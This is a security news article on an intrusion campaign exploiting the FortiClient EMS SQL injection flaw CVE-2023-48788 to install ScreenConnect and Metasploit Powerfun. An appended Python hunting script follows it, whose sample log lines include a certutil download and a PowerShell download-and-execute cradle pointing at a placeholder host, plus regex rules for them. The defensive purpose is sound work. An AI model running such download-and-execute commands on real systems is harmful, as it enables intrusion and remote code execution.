Hackers Exploit Fortinet Flaw, Deploy ScreenConnect, Metasploit in New Campaign


Cybersecurity researchers have discovered a new campaign that is exploiting a recently disclosed security flaw in Fortinet FortiClient EMS devices to deliver ScreenConnect and Metasploit Powerfun payloads.

The activity involves the exploitation of CVE-2023-48788 (CVSS score: 9.3), a critical SQL injection flaw that could allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted requests.

Cybersecurity firm Forescout is tracking the campaign under the codename Connect:fun, owing to the use of ScreenConnect and Powerfun for post-exploitation.


The intrusion targeted an unnamed media company whose vulnerable FortiClient EMS device was exposed to the internet shortly after the release of a proof-of-concept (PoC) exploit for the flaw on March 21, 2024.

Over the next couple of days, the unknown adversary was observed leveraging the flaw in unsuccessful attempts to download ScreenConnect and then install the remote desktop software using the msiexec utility.

However, on March 25, the PoC exploit was used to launch PowerShell code that downloaded Metasploit's Powerfun script and initiated a reverse connection to another IP address.


Also detected were SQL statements designed to download ScreenConnect from a remote domain ("ursketz[.]com") using certutil; the installer was then run via msiexec before the software established connections with a command-and-control (C2) server.

There is evidence to suggest that the threat actor behind the campaign has been active since at least 2022, specifically singling out Fortinet appliances and using the Vietnamese and German languages in their infrastructure.

"The observed activity clearly has a manual component, evidenced by all the failed attempts to download and install tools, as well as the relatively long time taken between attempts," security researcher Sai Molige said.


"This is evidence that this activity is part of a specific campaign, rather than an exploit included in automated cybercriminal botnets. From our observations, it appears that the actors behind this campaign are not mass scanning but choosing target environments that have VPN appliances."


Forescout said the attack shares tactical and infrastructure overlaps with other incidents documented by Palo Alto Networks Unit 42 and Blumira in March 2024 that involve the abuse of CVE-2023-48788 to download ScreenConnect and Atera.

Organizations are advised to apply the patches provided by Fortinet to address the flaw, monitor for suspicious traffic, and use a web application firewall (WAF) to block potentially malicious requests.
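The tooling chain described above (certutil download, msiexec install, PowerShell download cradle, each spawned from the EMS database service) is something a defender can hunt for in endpoint process-creation telemetry. The following is an added detection sketch, not code from Forescout or Fortinet; the pipe-delimited event layout, the sample events and the `sqlservr.exe` parent-process name are all assumptions made for this example.

```python
import re

# Constructed sample process-creation events (not real telemetry). The field layout
# "<timestamp>|<parent_image>|<image>|<command_line>" is an assumption for this example.
SAMPLE_EVENTS = [
    "2024-03-25T10:01:02|sqlservr.exe|cmd.exe|cmd.exe /c certutil -urlcache -f http://download.invalid/sc.msi C:\\Windows\\Temp\\sc.msi",
    "2024-03-25T10:01:09|cmd.exe|msiexec.exe|msiexec /i C:\\Windows\\Temp\\sc.msi /quiet",
    "2024-03-25T10:03:40|sqlservr.exe|powershell.exe|powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://download.invalid/p.ps1')",
    "2024-03-25T10:05:00|explorer.exe|msiexec.exe|msiexec /i C:\\Users\\alice\\Downloads\\vendor.msi",
    "2024-03-25T10:06:00|services.exe|svchost.exe|svchost.exe -k netsvcs",
]

# Each rule captures the artifact it acts on (a file path, or the cradle verb) so steps can be linked.
RULES = {
    "certutil_download": re.compile(r"certutil(?:\.exe)?\s+.*?-urlcache\s+.*?https?://\S+\s+(\S+)", re.I),
    "msiexec_install": re.compile(r"msiexec(?:\.exe)?\s+.*?(?:/i|/package)\s+(\S+\.msi)", re.I),
    "powershell_cradle": re.compile(r"powershell.*?(DownloadString|DownloadFile|Invoke-Expression|\bIEX\b)", re.I),
}

# A database engine should never spawn downloaders or installers. sqlservr.exe is an
# assumed parent name standing in for whatever the EMS backend runs as in your estate.
DB_PARENTS = {"sqlservr.exe"}

def classify(event):
    """Return a finding dict for one event, or None if no rule matches."""
    ts, parent, image, cmdline = event.split("|", 3)
    for name, rx in RULES.items():
        m = rx.search(cmdline)
        if m:
            return {"time": ts, "parent": parent, "image": image, "rule": name,
                    "artifact": m.group(1).lower(),
                    "severity": "high" if parent.lower() in DB_PARENTS else "medium"}
    return None

def scan(events):
    """Classify every event and keep the matches, in log order."""
    return [f for f in map(classify, events) if f]

def find_chains(findings):
    """Link a certutil download to a later msiexec install of the same file path."""
    downloaded, chains = {}, []
    for f in findings:
        if f["rule"] == "certutil_download":
            downloaded[f["artifact"]] = f
        elif f["rule"] == "msiexec_install" and f["artifact"] in downloaded:
            chains.append((downloaded[f["artifact"]], f))
    return chains

if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for h in hits:
        print(f"[{h['severity']}] {h['time']} {h['parent']} -> {h['image']} ({h['rule']})")
    for dl, inst in find_chains(hits):
        print(f"CHAIN: {dl['time']} download -> {inst['time']} install of {inst['artifact']}")
```

The lone `msiexec` event from `explorer.exe` is reported at medium severity only, which is the point: the same command line becomes high-severity when its parent is the database service, and a download-then-install pair on one path is a chain worth paging on.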
